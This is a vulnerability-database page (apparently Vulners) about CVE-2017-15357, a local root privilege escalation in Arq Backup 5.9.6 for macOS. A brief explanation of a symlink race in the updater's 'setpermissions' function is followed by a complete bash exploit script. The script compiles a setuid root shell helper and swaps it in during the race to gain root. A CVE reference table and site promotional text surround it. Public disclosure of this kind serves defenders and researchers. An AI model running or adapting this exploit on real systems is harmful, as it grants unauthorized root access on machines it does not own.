Vulners
Lucene search
Arq Backup 5.9.6 Local Root Privilege Escalation
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | Arq 5.9.6 - Local root Privilege Escalation Exploit | 6 Dec 201700:00 | – | zdt |
 | CVE-2017-15357 | 6 Dec 201700:00 | – | circl |
 | Haystack Arq for Mac 'setpermissions' function elevation of privilege vulnerability | 4 Dec 201700:00 | – | cnvd |
 | CVE-2017-15357 | 1 Dec 201717:00 | – | cve |
 | CVE-2017-15357 | 1 Dec 201717:00 | – | cvelist |
 | EUVD-2017-6813 | 7 Oct 202500:30 | – | euvd |
 | CVE-2017-15357 | 1 Dec 201717:29 | – | nvd |
 | CVE-2017-15357 | 1 Dec 201717:29 | – | osv |
 | Design/Logic Flaw | 1 Dec 201717:29 | – | prion |
`Arq Backup from Haystack Software is a great application for backing up macs and
windows machines. Unfortunately versions of Arq for mac before 5.9.7 are
vulnerable to a local root privilege escalation exploit.
The updater binary has a "setpermissions" function which sets the suid bit and
root ownership on itself but it suffers from a race condition that allows you to
swap the destination for these privileges using a symlink.
We can exploit this to get +s and root ownership on any arbitrary binary.
Other binaries in the application also suffer from the same issue.
This was fixed in Arq 5.9.7.
https://m4.rkw.io/arq_5.9.6.sh.txt
49cc82df33a3e23245c7a1659cc74c0e554d5fdbe2547ac14e838338e823956d
------------------------------------------------------------------------------
#!/bin/bash
##################################################################
###### Arq <= 5.9.6 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ####
##################################################################
vuln=`ls -la /Applications/Arq.app/Contents/Library/LoginItems/\
Arq\ Agent.app/Contents/Resources/arq_updater |grep 'rwsr-xr-x' \
|grep root`
cwd="`pwd`"
if [ "$vuln" == "" ] ; then
echo "Not vulnerable - auto-updates not enabled."
exit 1
fi
cat > arq_596_exp.c <<EOF
#include <unistd.h>
int main()
{
setuid(0);
seteuid(0);
execl(
"/bin/bash","bash","-c","rm -f $cwd/arq_updater;/bin/bash",
NULL
);
return 0;
}
EOF
gcc -o arq_596_exp arq_596_exp.c
rm -f arq_596_exp.c
ln -s /Applications/Arq.app/Contents/Library/LoginItems/\
Arq\ Agent.app/Contents/Resources/arq_updater
./arq_updater setpermissions &>/dev/null&
rm -f ./arq_updater
mv arq_596_exp ./arq_updater
i=0
timeout=10
while :
do
r=`ls -la ./arq_updater |grep root`
if [ "$r" != "" ] ; then
break
fi
sleep 0.1
i=$((i+1))
if [ $i -eq $timeout ] ; then
rm -f ./arq_updater
echo "Not vulnerable"
exit 1
fi
done
./arq_updater
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Dec 2017 00:00Current
1Low risk
Vulners AI Score1
EPSS0.00642